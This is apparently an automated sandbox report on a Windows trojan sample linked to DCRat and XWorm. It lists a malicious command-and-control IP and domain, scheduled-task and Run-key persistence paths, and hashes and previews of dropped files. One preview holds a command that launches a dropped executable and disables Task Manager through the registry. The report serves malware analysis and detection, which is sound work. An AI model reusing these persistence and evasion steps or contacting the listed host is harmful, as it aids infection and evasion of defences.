https://contoso.com/ | powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000017.00000002.1410489959.000002264D7C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | javaclient.exe, 00000002.00000002.3755345710.0000000003271000.00000004.00000800.00020000.00000000.sdmp, providerreviewdhcp.exe, 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1410489959.000002264D7C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
147.185.221.17 | light-liable.gl.at.ply.gg | United States | | 12087 | SALSGIVERUS | true
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1488678
                Start date and time:2024-08-06 11:51:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:46
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:cougif6lqM.exe
                renamed because original name is a hash value
                Original Sample Name:2bbc8212c548dcb848224a882b32492a.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@45/32@2/1
                EGA Information:
                • Successful, ratio: 20%
                HCA Information:
                • Successful, ratio: 65%
                • Number of executed functions: 433
                • Number of non-executed functions: 67
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, csrss.exe, schtasks.exe, WmiPrvSE.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target Memory Compression.exe, PID 7908 because it is empty
                • Execution Graph export aborted for target Memory Compression.exe, PID 7984 because it is empty
                • Execution Graph export aborted for target cmd.exe, PID 7200 because it is empty
                • Execution Graph export aborted for target cougif6lqM.exe, PID 7276 because it is empty
                • Execution Graph export aborted for target hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, PID 7312 because it is empty
                • Execution Graph export aborted for target hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, PID 7628 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 2128 because it is empty
                • Execution Graph export aborted for target providerreviewdhcp.exe, PID 7552 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:52:01 | API Interceptor | 22x Sleep call for process: powershell.exe modified
05:52:13 | API Interceptor | 13576201x Sleep call for process: javaclient.exe modified
10:52:00 | Task Scheduler | Run new task: cmd path: "C:\Users\user\cmd.exe"
10:52:00 | Task Scheduler | Run new task: cmdc path: "C:\Users\user\cmd.exe"
10:52:00 | Task Scheduler | Run new task: csrss path: "C:\Recovery\csrss.exe"
10:52:00 | Task Scheduler | Run new task: csrssc path: "C:\Recovery\csrss.exe"
10:52:00 | Task Scheduler | Run new task: hvxmowIikyCfRrhhAMpWFavmEnuKtL path: "C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe"
10:52:00 | Task Scheduler | Run new task: hvxmowIikyCfRrhhAMpWFavmEnuKtLh path: "C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe"
10:52:00 | Task Scheduler | Run new task: Memory Compression path: "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
10:52:00 | Task Scheduler | Run new task: Memory CompressionM path: "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
10:52:01 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Program Files\Windows Mail\WmiPrvSE.exe"
10:52:01 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Program Files\Windows Mail\WmiPrvSE.exe"
10:52:14 | Task Scheduler | Run new task: JavaClient path: C:\Users\user\AppData\Local\Temp\JavaClient.exe
10:52:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JavaClient C:\Users\user\AppData\Local\Temp\JavaClient.exe
10:52:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run JavaClient C:\Users\user\AppData\Local\Temp\JavaClient.exe
10:52:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JavaClient.lnk
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
147.185.221.17 | FUDE.bin.exe | Get hash | malicious | XWorm | Browse |
 | system47.exe | Get hash | malicious | XWorm | Browse |
 | setup.exe | Get hash | malicious | XWorm | Browse |
 | APPoKkkk8h.exe | Get hash | malicious | Unknown | Browse |
 | hatabat.exe | Get hash | malicious | Blank Grabber, DCRat, XWorm | Browse |
 | file.exe | Get hash | malicious | Stealerium, SugarDump, XWorm | Browse |
 | system.bat | Get hash | malicious | XWorm | Browse |
 | cheeto.exe | Get hash | malicious | XWorm | Browse |
 | loader.exe | Get hash | malicious | Binder HackTool, XWorm | Browse |
 | NECOv1fTXe.exe | Get hash | malicious | Neshta, XWorm | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
bg.microsoft.map.fastly.net | http://uk.shinydictionary.top/bx4ng7rcoxggna6/g1y0p8nnyk2/ghe35kh63f35h6h4/ | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | Packing List.exe | Get hash | malicious | Snake Keylogger | Browse | 199.232.210.172
 | MSIBCB9.dll | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | https://erateadvantage.com | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | RFQ-SW M-0013091-DHABI EQUIPMENT.TAR | Get hash | malicious | RedLine | Browse | 199.232.214.172
 | (No subject) (48).eml | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | http://singapore-changi-airport.com/transfers | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | https://royal-glade-286f.kdsj.workers.dev/help/637205020878504 | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | https://nkill-star.github.io/netflix-clone | Get hash | malicious | HTMLPhisher | Browse | 199.232.214.172
 | https://navya3396.github.io/netflixhomepage/ | Get hash | malicious | HTMLPhisher | Browse | 199.232.210.172
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SALSGIVERUS | killer.exe | Get hash | malicious | XWorm | Browse | 147.185.221.18
 | setup.exe | Get hash | malicious | XWorm | Browse | 147.185.221.21
 | msedge.exe | Get hash | malicious | AsyncRAT, VenomRAT | Browse | 147.185.221.20
 | z5F3uLmKBu.exe | Get hash | malicious | XWorm | Browse | 147.185.221.20
 | PMRpXCwamC.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 147.185.221.21
 | dH3bcNSEKG.exe | Get hash | malicious | XWorm | Browse | 147.185.221.20
 | Vjy8d2EoqK.exe | Get hash | malicious | Blank Grabber, DCRat, XWorm | Browse | 147.185.221.21
 | FUDE.bin.exe | Get hash | malicious | XWorm | Browse | 147.185.221.17
 | SSPInstallerV2.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse | 147.185.221.20
 | Xbox.exe | Get hash | malicious | XWorm, Xmrig | Browse | 147.185.221.20
                                    No context
                                    No context
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (591), with no line terminators
                                    Category:dropped
                                    Size (bytes):591
                                    Entropy (8bit):5.855765779588202
                                    Encrypted:false
                                    SSDEEP:12:G0np3E3XV40bh8+KqpPkupGcCIIFCMR3wg/BWm+Bl1nPAIIu/:1u3Xrh8+KqxecCGMRNgJDAz0
                                    MD5:41555E8BE34D68781BF14340B755846A
                                    SHA1:0471F9C9E3ACC899315FF1394395FC44DBCB4D66
                                    SHA-256:C27996E0258AF577DAF22147E867825F2C95A0C10DECB7E9E9219CA6A25BF4BC
                                    SHA-512:ACCD0DFFC8E563AAC3DEDA772AD5EB4C78B8F88BEC9C9B53EDF2817BBEABEC524758F2B094FE4C642612CBE3D1698551E44971023C9FA378D5D6514F7193474C
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):153
                                    Entropy (8bit):5.0227587512891265
                                    Encrypted:false
                                    SSDEEP:3:I5qgQ5VZTVNZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKD:Ior5VZTV2TStuH1jhRiI36BY
                                    MD5:399AF29D9E585DFA84153C9E8391A4C2
                                    SHA1:B187F84C3189AFA7A16A47FD48F1CC13B92240C7
                                    SHA-256:34C1022005B752640628AE992883C2171B422A1256A326C97DEFCC57DC871C6D
                                    SHA-512:E7950BCAC463854B2A0F99FA73AA5CC3B828F11CFDA1550EDF1508473DFF031A09FFB5859C6EE39D3B31DFE7A2B99BF723696E22BB599CDAEB758CAE928E59D1
                                    Malicious:false
                                    Preview:"C:\Componenthost\providerreviewdhcp.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):216
                                    Entropy (8bit):5.7731349012435755
                                    Encrypted:false
                                    SSDEEP:6:GVwqK+NkLzWbHnPv7qK+NkLzWHmPruTLzvQqIFk+7s:G4MCzWLnP/MCzWGPruHzYo+7s
                                    MD5:936B4D63770A4CD26E907D7D9D6D4260
                                    SHA1:70FBA586E95FD236CA8239C0C0B0D678F99F71B7
                                    SHA-256:A259F59D9035B30DFA5D82F2F8707D6CAF2632841E4BAF00D4A5B019089DEC8C
                                    SHA-512:3F9ED5DABC43641BF29056C71BBF772A9AF946CE5C55ECB7BD18DD411A8D1CE54993EB56176575F0B9F11FFEF7749C35FDDC96415430271B8708E4A8FF42B5A8
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):130
                                    Entropy (8bit):5.61819401701826
                                    Encrypted:false
                                    SSDEEP:3:XZgs9HsbMUEhQjqJ+RJDp50U1p8MLKLTXj3NFWQZn:JgyIMUErJuJDXt1nLKLHNFxZ
                                    MD5:B1A5F65539BC600043623188E425AA9C
                                    SHA1:207B7C8366B16F1BE8591B16EDC1C2970B0C9259
                                    SHA-256:12FB68F6754A47C0CB4216405191D54FC3DCDD6A58434B730492397F2EC0A813
                                    SHA-512:8053CDAB9A94AC6EA78BEB259468B2E0A6A2F3BA5E2BA6E3035B4DF2612BA485DB92F361D3943D32037119C9A1616B95742AA968C4760081F8488F3718CE19BD
                                    Malicious:false
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (771), with no line terminators
                                    Category:dropped
                                    Size (bytes):771
                                    Entropy (8bit):5.900985151127558
                                    Encrypted:false
                                    SSDEEP:12:mMKrhd2SS8+2RZn9XDI55EtCXMtyrEhr3fKdBSx2tqfOy/WfMSrWTrlmE6CG0vX4:m1PNZXDsExwQhudq5WpCTMCtKJ62mV2
                                    MD5:C9E37A0655081F8A6FD5D0B886D932BF
                                    SHA1:006493A321CEF2BDB5D6530B26EFEDC86BEE2B05
                                    SHA-256:0438FCF0C4E2852988E71F128269CDFF928CA37B66114DEDB3FE24F4612BE0D0
                                    SHA-512:0584A6BF0F3BBBFF3A0DC5D5CF97E850A0812F8242D246D8C23D7DF5722B2B229558054CC1559EED6060FDE2DB0A547C3CF79567839B059D52AD20F85AC479D6
                                    Malicious:false
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                     • Antivirus: Virustotal, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (397), with no line terminators
                                    Category:dropped
                                    Size (bytes):397
                                    Entropy (8bit):5.869150935958587
                                    Encrypted:false
                                    SSDEEP:12:p9qTU8Mjdq2vzhGzdMGvXIcQB4jBqixleri0aG:pgY8L2YdPvXIcQB41mtaG
                                    MD5:0B6D8E06E0056647E26E959066231093
                                    SHA1:4B886B23005D9917CBA9C96C8931FEC5AD75CD04
                                    SHA-256:520238DD32AC860F8181775EABAE5D8DF3192E85F1603C53B310D0D5DF1BED1F
                                    SHA-512:D7C08489258B79CD1F2EF0C4189197845E1FC56C4C887ABED197CF5586A42FF3A0FFFA040DBC6162A6F47096EA71C68808A6EB48342B1CDDC20F092986E14BA3
                                    Malicious:false
                                    Preview:hr0nDlwwt7r9e4s5FMTV2DIqmu5mcr1viRbsYxBQZTaJoX6Gg4wQvCfdjJASpKUCF6aNcAhSKC5in8COxzFi5l9gv7JOxslP8YEs6sngWeFsH60lHvf0FwHe64cf1SfcbqjO4TSFLjLbgQYyGiHBNuKMQjvCQIpD8nRaWlrxdaogkq8pfnYTLdOqgX8UhQyD3Ic298be0ThxGolklGgmuV1fYk49nXPNlkmcOFqhM3c26bk2vXsbtMTiQ7eZEc1dDTLfCJVgZ8Z139i79BOPpyeYREMRlRduC8ymPE0lCLCuxcoQYgZCOlyPzxO77E5Ifpy5K5r5LmNdwtlzZ52E1bgbJjxc02o7P3PHntGcze0lXUdGLZiBL1QEJXvkIPFT7QO2deLqyZPXk
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                     • Antivirus: Avira, Detection: 100%
                                     • Antivirus: Joe Sandbox ML, Detection: 100%
                                     • Antivirus: ReversingLabs, Detection: 88%
                                     • Antivirus: Virustotal, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (406), with no line terminators
                                    Category:dropped
                                    Size (bytes):406
                                    Entropy (8bit):5.863202804648079
                                    Encrypted:false
                                    SSDEEP:6:WahQSoN3j5ZydbciIJvHceKUSEtwyxKWQ8G+ISKMkIgq7gDjuFfU5gU:phQj1jXIbrIlRPrtD4+RKMkggaf6
                                    MD5:1ACB1C56C7D4020017B12AF461CA2FD2
                                    SHA1:6B1071C65C4548A92823DC1AE79825D1CABF214D
                                    SHA-256:22F60038268311BBC7120F9832F8A1F46E9FA170FEF4207844C180C321D97BC2
                                    SHA-512:5AB0F39E1C563A2B02C47784D7C5AC948DD86D6B31B01FFFEE98FE9E7400E7DBC7863F2359B94184321C5F3CC7AAD861BF1972FFB0DF641FA41053FED71856CF
                                    Malicious:false
                                    Preview:E6xRdi295HaBPSPbQTDzCuFdpYWLr9pRyMeHUYFCmAFzdHhzLviO3pWT1UlFMrS5bIMDxIG2OANBoQAh1gA6baYJzKPAw9z4sJXV5dBDoqA2cUplTDOprVeAuCOn2GFPLSTf3pmXf6RuafrefoqtuKNWpWl2PXLilvrJBJsob0JuEukOVtINZVeAE60gEtIHvtJpyhcV6CS4AdS5wWhfP8JPRqFFTLkrrC9Uk4ZxQwQWDj9kn5urMn1xk3YHcXBvckM8e7U17uOdrwMrrfcYa3fEKMurgSV3vf4cXAGpk3tbYYFxrra64mUjFHySNmUpZUsM1tTqYwxhJDqvG6Az1Y8IKVXPMxc8iECDq258XtiIyxaBbDLQmfxAWjBgVDekUz8EAmENACbIz0TX5VyImL
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 88%
                                     • Antivirus: Virustotal, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (566), with no line terminators
                                    Category:dropped
                                    Size (bytes):566
                                    Entropy (8bit):5.868992207806771
                                    Encrypted:false
                                    SSDEEP:12:LzjP27pQ17qLyxyEQ1S2WMRhcX2+18dTY1oKOnhlplan:LEJLyxNT2VhcX29cXOva
                                    MD5:2258D92E44BBE3DDC88B66D2BE98F27E
                                    SHA1:1DB62E5D1E686F42F9452D88C664624103F9569C
                                    SHA-256:A0F74A2E8836D9E05F0E63DD074E51F2EBCCEF0A3AE0A096C3C53AF14C05D5C0
                                    SHA-512:9B6E6A480AC1239EB81902B10BE65EC1A788D872DEAD16CC5DAB0DA255C9B6ABB01B87926DF92FA3BC66A2224BA5E4C28AF5503DF6724B4E5A59F9094E38B41E
                                    Malicious:false
                                     Preview:
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 88%
                                     • Antivirus: Virustotal, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1281
                                    Entropy (8bit):5.370111951859942
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Users\user\cmd.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1281
                                    Entropy (8bit):5.370111951859942
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                    Malicious:false
